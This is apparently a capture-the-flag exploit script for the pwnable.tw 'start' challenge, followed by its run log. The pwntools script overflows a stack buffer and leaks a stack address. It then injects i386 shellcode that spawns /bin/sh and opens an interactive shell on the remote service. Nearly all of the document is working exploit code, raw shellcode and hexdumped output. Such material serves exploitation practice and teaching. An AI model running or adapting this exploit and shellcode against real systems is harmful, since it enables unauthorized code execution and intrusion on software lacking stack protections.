from pwn import *
def send_payload(payload):
    """Write *payload* to the module-level tube ``r`` after logging it.

    The bytes are logged via ``repr`` so non-printable characters show up
    verbatim in the transcript, then sent unchanged (no trailing newline).
    ``r`` and ``log`` come from the script's top level / ``pwn`` import.
    """
    shown = repr(payload)
    log.info("Send payload = %s" % shown)
    r.send(payload)
def sendline_payload(payload):
    """Log *payload* with ``repr`` and send it through ``r.sendline``.

    Identical to ``send_payload`` except that the tube appends its line
    terminator; ``r`` is the connection created at module level.
    """
    shown = repr(payload)
    log.info("Send payload = %s" % shown)
    r.sendline(payload)
# Python 2 / pwntools script (note the `print` statements): payloads are
# `str`, which here means raw bytes. Under Python 3 these would have to be
# `bytes` literals.
binary = './start'
host = 'chall.pwnable.tw'
port = 10000
elf = ELF(binary)
context(arch = 'i386', os = 'linux')
# 'debug' makes pwntools hexdump every byte sent/received; that is where the
# [DEBUG] blocks in the run log below come from.
context.log_level = 'debug'
# Any extra command-line argument selects the remote service; with none the
# binary is run locally. `sys` is available through `from pwn import *`.
REMOTE = len(sys.argv) >= 2
if REMOTE:
    r = remote(host, port)
else:
    r = process(binary)
# 21 bytes of raw i386 machine code (the run log's second hexdump shows it as
# the tail of the 0x2d-byte payload, containing the text "/bin//sh").
shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
# The program's banner ends with ':' (see the log: "Let's start the CTF:").
print r.recvuntil(':')
rop = ROP(elf)
# First message: 20 bytes of filler followed by one 4-byte address inside the
# binary (no PIE, base 0x8048000 per checksec). What sits at 0x08048087 is not
# visible here — presumably a location whose execution echoes stack contents.
payload = 'A' * 20
rop.raw(0x08048087)
print rop.dump()
payload += rop.chain()
send_payload(payload)
# NOTE: recv(4) returns whatever is buffered, up to 4 bytes. The log shows
# 0x14 bytes arriving in one read, so the first 4 are a complete value here;
# unpack() decodes them little-endian per the i386 context (70 0a 89 ff -> ff890a70).
stack_addr = r.recv(4)
log.info('Stack addr : %x' % unpack(stack_addr))
# Second message: the same 20-byte filler, then a pointer 20 bytes past the
# value received above (log: \x84\n\x89\xff == 0xff890a70 + 0x14), then the
# shellcode itself. This layout only works because checksec reports no stack
# canary and NX disabled; either mitigation is designed to stop exactly this.
payload = 'A' * 20
payload += pack(unpack(stack_addr)+20)
payload += shellcode
send_payload(payload)
# Hand the connection to the terminal; the log's last line is what came back.
r.interactive()
python exploit.py r
[*] '/home/vagrant/host-share/pwnabletw/Start/start'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
[+] Opening connection to chall.pwnable.tw on port 10000: Done
[DEBUG] Received 0x14 bytes:
"Let's start the CTF:"
Let's start the CTF:
[*] Loaded cached gadgets for './start'
0x0000: 0x8048087
[*] Send payload = 'AAAAAAAAAAAAAAAAAAAA\x87\x80\x04\x08'
[DEBUG] Sent 0x18 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
00000010 41 41 41 41 87 80 04 08 │AAAA│····││
00000018
[DEBUG] Received 0x14 bytes:
00000000 70 0a 89 ff 01 00 00 00 34 0f 89 ff 00 00 00 00 │p···│····│4···│····│
00000010 46 0f 89 ff │F···││
00000014
[*] Stack addr : ff890a70
[*] Send payload = 'AAAAAAAAAAAAAAAAAAAA\x84\n\x89\xff1\xc9\xf7\xe1Qh//shh/bin\x89\xe3\xb0\x0b\xcd\x80'
[DEBUG] Sent 0x2d bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
00000010 41 41 41 41 84 0a 89 ff 31 c9 f7 e1 51 68 2f 2f │AAAA│····│1···│Qh//│
00000020 73 68 68 2f 62 69 6e 89 e3 b0 0b cd 80 │shh/│bin·│····│·│
0000002d
[*] Switching to interactive mode
\x00\x00\x004\x0f\x89\xff\x00\x00\x00\x00F\x0f\x89\xff$